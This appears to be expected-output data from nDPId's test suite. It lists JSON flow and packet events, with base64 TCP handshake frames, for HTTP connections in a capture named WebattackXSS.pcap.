-00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":280,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1499346994731,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499346994731,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8ErdAAD4GsxmsEAABwKgKMs0cAFAyGBDiAAAAAKACchBLDwAAAgQFtAQCCAoBOQJVAAAAAAEDAwc="} 
-00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":281,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1499346994731,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499346994731,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQzRyBtZXkMhgQ46AScSBcpQAAAgQFtAQCCAoD4tPMATkCVQEDAwc="} -00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":282,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":3,"flow_last_seen":1499346994732,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499346994732,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0ErhAAD4GsyCsEAABwKgKMs0cAFAyGBDjgbWV5YAQAOX7rAAAAQEICgE5AlUD4tPM"} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":295,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499346997314,"flow_last_seen":1499346997314,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499346997314,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52534,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":295,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1499346997314,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499346997314,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8ZWRAAD4GYGysEAABwKgKMs02AFBhbWG\/AAAAAKACchDIPAAAAgQFtAQCCAoBOQTbAAAAAAEDAwc="} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":296,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1499346997314,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499346997314,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQzTaSy6RrYW1hwKAScSC3rwAAAgQFtAQCCAoD4tZSATkE2wEDAwc="} -00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":297,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":3,"flow_last_seen":1499346997315,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499346997315,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0ZWVAAD4GYHOsEAABwKgKMs02AFBhbWHAksukbIAQAOVWtwAAAQEICgE5BNsD4tZS"} 
-00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":307,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499346998578,"flow_last_seen":1499346998578,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499346998578,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52548,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":307,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1499346998578,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499346998578,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8K3xAAD4GmlSsEAABwKgKMs1EAFB2Xi1rAAAAAKACchDmVQAAAgQFtAQCCAoBOQYXAAAAAAEDAwc="} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":308,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":2,"flow_last_seen":1499346998579,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499346998579,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQzUQbBzt5dl4tbKAScSC1QwAAAgQFtAQCCAoD4teOATkGFwEDAwc="} 
-00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":309,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":3,"flow_last_seen":1499346998579,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499346998579,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0K31AAD4GmlusEAABwKgKMs1EAFB2Xi1sGwc7eoAQAOVUSwAAAQEICgE5BhcD4teO"} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":328,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347001111,"flow_last_seen":1499347001111,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347001111,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52574,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":328,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1499347001111,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347001111,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8kNhAAD4GNPisEAABwKgKMs1eAFDMzJhIAAAAAKACchAidwAAAgQFtAQCCAoBOQiQAAAAAAEDAwc="} 
-00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":329,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":2,"flow_last_seen":1499347001111,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347001111,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQzV4q6d3azMyYSaAScSA8qAAAAgQFtAQCCAoD4toHATkIkAEDAwc="} -00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":330,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":3,"flow_last_seen":1499347001112,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347001112,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0kNlAAD4GNP+sEAABwKgKMs1eAFDMzJhJKund24AQAOXbrwAAAQEICgE5CJAD4toH"} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":337,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347002399,"flow_last_seen":1499347002399,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347002399,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52588,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":337,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":1499347002399,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347002399,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8d7tAAD4GThWsEAABwKgKMs1sAFBA8H5pAAAAAKACchDG4gAAAgQFtAQCCAoBOQnSAAAAAAEDAwc="} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":338,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":2,"flow_last_seen":1499347002399,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347002399,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQzWx3BXtPQPB+aqAScSD2QAAAAgQFtAQCCAoD4ttJATkJ0gEDAwc="} -00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":339,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":3,"flow_last_seen":1499347002400,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347002400,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0d7xAAD4GThysEAABwKgKMs1sAFBA8H5qdwV7UIAQAOWVSAAAAQEICgE5CdID4ttJ"} 
-00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":352,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347003695,"flow_last_seen":1499347003695,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347003695,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52602,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":352,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1499347003695,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347003695,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8ZUVAAD4GYIusEAABwKgKMs16AFBCXW5TAAAAAKACchDUOQAAAgQFtAQCCAoBOQsWAAAAAAEDAwc="} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":353,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":2,"flow_last_seen":1499347003695,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347003695,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQzXqmA8avQl1uVKAScSCH9QAAAgQFtAQCCAoD4tyNATkLFgEDAwc="} 
-00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":354,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":3,"flow_last_seen":1499347003696,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347003696,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0ZUZAAD4GYJKsEAABwKgKMs16AFBCXW5UpgPGsIAQAOUm\/QAAAQEICgE5CxYD4tyN"} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":367,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347006233,"flow_last_seen":1499347006233,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347006233,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52628,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":367,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1499347006233,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347006233,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8WV1AAD4GbHOsEAABwKgKMs2UAFDN5FTMAAAAAKACchBfpAAAAgQFtAQCCAoBOQ2RAAAAAAEDAwc="} 
-00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":368,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":2,"flow_last_seen":1499347006233,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347006233,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQzZSBD41szeRUzaAScSBvHQAAAgQFtAQCCAoD4t8HATkNkQEDAwc="} -00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":369,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":3,"flow_last_seen":1499347006234,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347006234,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0WV5AAD4GbHqsEAABwKgKMs2UAFDN5FTNgQ+NbYAQAOUOJQAAAQEICgE5DZED4t8H"} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":379,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347007496,"flow_last_seen":1499347007496,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347007496,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52642,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":379,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":1499347007496,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347007496,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8xEhAAD4GAYisEAABwKgKMs2iAFDPCcqEAAAAAKACchDnfQAAAgQFtAQCCAoBOQ7MAAAAAAEDAwc="} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":380,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":2,"flow_last_seen":1499347007496,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347007496,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQzaKR1tjLzwnKhaAScSCZlAAAAgQFtAQCCAoD4uBDATkOzAEDAwc="} -00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":381,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":3,"flow_last_seen":1499347007496,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347007496,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0xElAAD4GAY+sEAABwKgKMs2iAFDPCcqFkdbYzIAQAOU4nAAAAQEICgE5DswD4uBD"} 
-00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":400,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347010080,"flow_last_seen":1499347010080,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347010080,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52668,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":400,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":1499347010080,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347010080,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8aVxAAD4GXHSsEAABwKgKMs28AFAhFXgOAAAAAKACchDlSAAAAgQFtAQCCAoBORFSAAAAAAEDAwc="} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":401,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":2,"flow_last_seen":1499347010080,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347010080,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQzbww\/OHGIRV4D6AScSDsuAAAAgQFtAQCCAoD4uLJATkRUgEDAwc="} 
-00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":402,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":3,"flow_last_seen":1499347010081,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347010081,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0aV1AAD4GXHusEAABwKgKMs28AFAhFXgPMPzhx4AQAOWLvwAAAQEICgE5EVMD4uLJ"} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":409,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347011349,"flow_last_seen":1499347011349,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347011349,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52682,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":409,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":1499347011349,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347011349,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8RzxAAD4GfpSsEAABwKgKMs3KAFCfKlWsAAAAAKACchCISQAAAgQFtAQCCAoBORKQAAAAAAEDAwc="} 
-00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":410,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":2,"flow_last_seen":1499347011350,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347011350,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQzcqa6hS4nypVraAScSDxmwAAAgQFtAQCCAoD4uQHATkSkAEDAwc="} -00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":411,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":3,"flow_last_seen":1499347011350,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347011350,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0Rz1AAD4GfpusEAABwKgKMs3KAFCfKlWtmuoUuYAQAOWQowAAAQEICgE5EpAD4uQH"} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":424,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347012617,"flow_last_seen":1499347012617,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347012617,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52696,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":424,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":1499347012617,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347012617,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8mKRAAD4GLSysEAABwKgKMs3YAFAU4YtpAAAAAKACchDbigAAAgQFtAQCCAoBORPNAAAAAAEDAwc="} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":425,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":2,"flow_last_seen":1499347012617,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347012617,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQzdgtNmaCFOGLaqAScSBfigAAAgQFtAQCCAoD4uVEATkTzQEDAwc="} -00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":426,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":3,"flow_last_seen":1499347012618,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347012618,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0mKVAAD4GLTOsEAABwKgKMs3YAFAU4YtqLTZmg4AQAOX+kQAAAQEICgE5E80D4uVE"} 
-00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":439,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347015165,"flow_last_seen":1499347015165,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347015165,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52722,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":439,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":1,"flow_last_seen":1499347015165,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347015165,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8wXxAAD4GBFSsEAABwKgKMs3yAFDEv9c2AAAAAKACchDdRwAAAgQFtAQCCAoBORZKAAAAAAEDAwc="} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":440,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":2,"flow_last_seen":1499347015165,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347015165,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQzfKguKOtxL\/XN6AScSCuHQAAAgQFtAQCCAoD4ufAATkWSgEDAwc="} 
-00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":441,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":3,"flow_last_seen":1499347015166,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347015166,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0wX1AAD4GBFusEAABwKgKMs3yAFDEv9c3oLijroAQAOVNJQAAAQEICgE5FkoD4ufA"} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":451,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347016455,"flow_last_seen":1499347016455,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347016455,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52736,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 